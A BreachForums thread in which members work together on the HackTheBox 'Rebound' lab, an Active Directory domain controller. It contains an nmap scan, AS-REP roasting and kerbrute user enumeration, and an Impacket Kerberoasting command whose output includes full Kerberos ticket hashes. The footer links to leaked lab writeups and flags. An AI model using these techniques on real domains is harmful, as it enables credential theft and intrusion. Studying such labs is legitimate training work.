JOIN BREACHFORUMS TELEGRAM
HTB - Rebound
by HerVelizy - Saturday September 9, 2023 at 07:09 PM
Breached
Member
Posts: 17
Threads: 1
Joined: Aug 2023
Reputation: 0
#1
Sep 09, 2023, 07:09 PM (This post was last modified: Sep 09, 2023, 07:26 PM by HerVelizy.)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-10 02:08:09Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49714/tcp open  msrpc        Microsoft Windows RPC
49723/tcp open  msrpc        Microsoft Windows RPC
Reply
Breached
Member
Posts: 7
Threads: 0
Joined: Aug 2023
Reputation: 0
#2
Sep 09, 2023, 08:11 PM (This post was last modified: Sep 09, 2023, 08:12 PM by lucius222.)
we can asreproast the user jjones but password is not in rockyou
got some users with kerbrute

jjones
tbrady
ppaul
mmalone
Reply
Breached
Member
Posts: 17
Threads: 1
Joined: Aug 2023
Reputation: 0
#3
Sep 09, 2023, 08:14 PM
(Sep 09, 2023, 08:11 PM)lucius222 Wrote: we can asreproast the user jjones but password is not in rockyou
got some users with kerbrute

jjones
tbrady
ppaul
mmalone

I have the hash for the first but hashcat doesn't find anything
Reply
Breached
Member
Posts: 7
Threads: 0
Joined: Aug 2023
Reputation: 0
#4
Sep 09, 2023, 08:19 PM
maybe we need to create a custom wordlist

(Sep 09, 2023, 08:14 PM)HerVelizy Wrote:
(Sep 09, 2023, 08:11 PM)lucius222 Wrote: we can asreproast the user jjones but password is not in rockyou
got some users with kerbrute

jjones
tbrady
ppaul
mmalone

I have the hash for the first but hashcat doesn't find anything
Reply
Breached
Member
Posts: 17
Threads: 1
Joined: Aug 2023
Reputation: 0
#5
Sep 09, 2023, 08:34 PM
Starting from rebound for example ?

I don't see any clue for a wordlst.

(Sep 09, 2023, 08:19 PM)lucius222 Wrote: maybe we need to create a custom wordlist

(Sep 09, 2023, 08:14 PM)HerVelizy Wrote:
(Sep 09, 2023, 08:11 PM)lucius222 Wrote: we can asreproast the user jjones but password is not in rockyou
got some users with kerbrute

jjones
tbrady
ppaul
mmalone

I have the hash for the first but hashcat doesn't find anything
Reply
Breached
Member
Posts: 17
Threads: 1
Joined: Aug 2023
Reputation: 0
#6
Sep 09, 2023, 10:01 PM
Dis someone try to use ServiceMgmt user ?

(Sep 09, 2023, 09:42 PM)IXNovaticula Wrote: Yeah there doesn't seem to be anything that we can scrape for a wordlist.


(Sep 09, 2023, 08:34 PM)HerVelizy Wrote: Starting from rebound for example ?

I don't see any clue for a wordlst.

(Sep 09, 2023, 08:19 PM)lucius222 Wrote: maybe we need to create a custom wordlist

(Sep 09, 2023, 08:14 PM)HerVelizy Wrote:
(Sep 09, 2023, 08:11 PM)lucius222 Wrote: we can asreproast the user jjones but password is not in rockyou
got some users with kerbrute

jjones
tbrady
ppaul
mmalone

I have the hash for the first but hashcat doesn't find anything
Reply
Banned

Posts: 32
Threads: 0
Joined: Jul 2023
Reputation: 0
#7
Sep 10, 2023, 10:04 AM
(Sep 10, 2023, 10:00 AM)Whatever911 Wrote: Couldn't find anything that works when trying a few worldlists with crackmapexec.. Sad

How did you find the hashes, btw? I mean, for the jjones user?

you can get them via asreproast

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
Breached
Member
Posts: 7
Threads: 0
Joined: Aug 2023
Reputation: 0
#8
Sep 10, 2023, 01:08 PM
we could be able to kerberoast, but it's not working for me
https://www.thehacker.recipes/ad/movemen...entication
Reply
Breached
Member
Posts: 2
Threads: 0
Joined: Sep 2023
Reputation: 0
#9
Sep 10, 2023, 01:09 PM
When you try to pass ldap authentication through CME on your ServiceMgmt account, you get the error LDAP Signing IS Enforced...
Reply
Breached
Member
Posts: 7
Threads: 0
Joined: Aug 2023
Reputation: 0
#10
Sep 10, 2023, 03:00 PM
(Sep 10, 2023, 02:24 PM)0x410x420x41 Wrote:
(Sep 10, 2023, 01:08 PM)lucius222 Wrote: we could be able to kerberoast, but it's not working for me
https://www.thehacker.recipes/ad/movemen...entication

Yea but you need a list of valid SPNs... i've tried with the most generic ones without success
Edit: i was able to get a SPN but i am still not sure how viable is it..
```
root@3818efcacdb8:~/impacket/examples# python GetUserSPNs.py -no-preauth "jjones" -usersfile "services.txt" -dc-host 10.129.108.163 rebound.htb/ -request
Impacket v0.10.1.dev1+20221010.112219.ea8f2efe - Copyright 2022 SecureAuth Corporation

[-] Principal: cifs/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: cifs/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: srv01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$ldap/dc01$REBOUND.HTB$*ldap/dc01*$52f711156a4f409ddcd49b60$8b779ba2cb96e084dde5bd121a47b116362e8031ccfa05aeb39038d0c84b1cc1184436e9999d0d85f4f090868ace36b95abced9512cc546685d2bc101a984232c19a8f9ff45d52df09eecb02ddc6e69f02164f1f2159e101b0e6625d2caacdca38aae2e4bfc9cbea26202e07dac0a2c973dd3d4bbce128504ab862f4edcadea4f96cd961a0d7bc828d46a54120dbe954aec3a2fb542ed0abaf5195c4af1f434ad2b1281714ca56a8576606fde8926aa366b43039e432a0d143de322b9b02dbb003991bf8c60d5c3c93cbff77fe1a857a2f1d0f385359c2d517ab2dc3365fe0b7718a8dbdc0fd04875c747cd010e2a95031f2701b240cf9effa65df40da4be50fad962cb2ac7e3cdfa7b3f42e82c7a5f650c3426f2ff403113012ee35a416b80193cb932a404ffbce1e1a84556337d5acbd757f876f714a500f799ae00ff9e5d40d50f5fec803d1fd004cd0c0f2f0e08d47be02b2f933c9bb58d39e1979db522424cadc7d6e63aa9d9c669ef849eab12d79d6f813ec1f0f2fe6d4c5601330d9af401c314b860976df040f621f9420afbb07042997ee5bac748b2c63b85e35cd3f05bfba779014fe71644a9db4e1ede63b164272ef2203a9e5ebee835953f4ead3aa4f27e10b9dac6395c323435ac9ca56a99794f9b4e7a37e2fb1263ecb2e4b0c82f3901a13647678f127f28ae0cf8393d7bf81fcb24b59f8ce30a6d6d1139a21ccc61d8df75de99652fbdc56616a62685d4ba20a490a0817b3ec32ada763dc7184a725056783f2ab857a82e739bc669e681d8b42ae5a86dbb1d85bbfc13b9d6f9e680511f3b1ba44fe5954f2c0ca03441d4623bf9e4f5fbb104d3bbfcd6adad4e0b0c77d99b3a047c23d1b9345039027205eff730a75a146c560639cc3e25f6fc74840c1a8f98f0dd4ce075a93df3c881529624f9dd6ca5776d218af8fafe996d6a6502d940e49a6f5ef36f1b6d76bdb79cf6d5a24d6173d6ebddf872c79a307e43d3f69faaf1383ac973443e8b61aea70310a1e9769dbed10a95838d249e1a3e33eb454ee8455f3604278def8746a91deb648a21b146a04e3b1ba63b439d9d623bfec7e792543fb7d999427129f763c2d3bda3debc40b8fab97fbd01885a3fc82ca0e4af9a0657d1a19bdc1a06c601494c303d59affc547b10d666f7ae2fb9a5bfa8d4f93b413e5bf1b89565385bce0e39b8c6539522f06305093cae7ac8210e0971f98e4fd3a2e13caec811b904a82258f1700cf4f6f5ca90ed80f3f7d6ff4672a599bf592d4c0dbff3d8d9ca2a9201417a462f5e1bd1f97abded9cec850485a0c6121f1a66a3d2626305311b26115eabe9703ff6dd141a72f7f885ae0e45dc33210a79fda5f8ab7d2
$krb5tgs$18$ldap/dc01.rebound.htb$REBOUND.HTB$*ldap/dc01.rebound.htb*$4cbf811cb806b7a32e17afbe$089ec0e576e629bf76f1c0827da459033b245ecd012040121b3cf425ba2bf351cd4558b6280f707b1248bb9f0762b90e264be8271fab4b53578dfbc8df3ce19f8e4dd0e9e77bec4bccbd83edd999d0ff710d9a22a3c42df4914d1878a1514c27440ab1c486fe823a29ddb58017d2b9d1e7b771e696d51ea1de3f0c1dfc0660f9befd2652ad362906996846d012e50a333a6025688590e6ea6aedf516cba9f9f10f314e01bad69699badd59e96c0c15735de88592604e789d67e23254ad2f9fcf7e34e79cf0efdc68c72767a6cddb5aaf6b2620292b1b636ebe8fa94428b876647e92479c2a9b0cf14336d5d7dd82460ff15f0b0f1c36969f699c126678d983d835daac7d901d0fa2ca0ce75b84181f1d881af45517f294127db898e0fcd4666695514a41afc79d8550d702282bbe09b927dafab38403d8bd0820a083f5bb78686781e29dbed859cdad85d117bd0b9d1c9203ac211ac3832fdfb9043f2ff57a06f0348b33953c033dc183bf1eca7e287641ef32a3f783c99c3a499d49d2aa3c80021d444915e12fdbdbf5a96bf0808533c919c99c9fb53240a24594dd44e47d7cf5407864516c9d380a96976a2258b2d6a88fddd0feb8b0846dfd6713b4778605f8bbaad660b338b4a79535c8ff2f57fe7854f8b2495a160fd77eab09d12fd722a9b0d628e6268ea627d6c0467f6a151a2d1bd2f4e4db3a92b9ff69153ccbe80d700d2779766546e27e2ee5d93228c74bc2000fb00be7151cee782cab3381f1fc9e3fa50ab51e65d1f7ef699cba79dda4b76b7edd08c28a005e926951414acb3f404d40d30a1376c695ea0c998c4001ed48b733e285b86ab17bfd5d4f22e62e865cf8577fcbf967ec82536c37a7145b73b69de456af9783942f1f61ad412cdadfe6359b57c227f87710cfe4dbc019f19a54a5c3b875b3e5b3277dba84f33e869eb17217fe86e08ef704790ae57511b689eff8e8b5b07ddc102dd490ab0699ec76d9bbf14da0a028a83669eeffdb93e3bf547d4ded6b2d92170eb27608520113e66696d9dd982c3fd2e2bd0a9cee421f8e8500a90f21fa4a50b1b488ad19090e6755258a9fa439da5008ec4ca28a973e70d915099ed1eaf278bd428d651e9852e46df76ed71e8755645c7c604c3e03e7dc8b49a40efd43f21f3fe19f0674687e1da20a4d686f1857b42dbda35e63846783faf1b6cdb6783b94d41e7b62be5105a82383979c34669f8bd1fd47c992b9215cf9623d99268c42431708e4893634a4dee1e2c27c39e54e3c0ca1bd1f649c6bc5efe83ae4a6ff3ed4b70b6446e691a60a3dc0e11ed86ea9d8cdfcd121838208b963e7fc508c5c66493330f861e0914aca6b391325a8801e292457

```

yeah same here, i don't know what to do with it
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,934 7 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,536 7 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,797 8 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,614 11 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)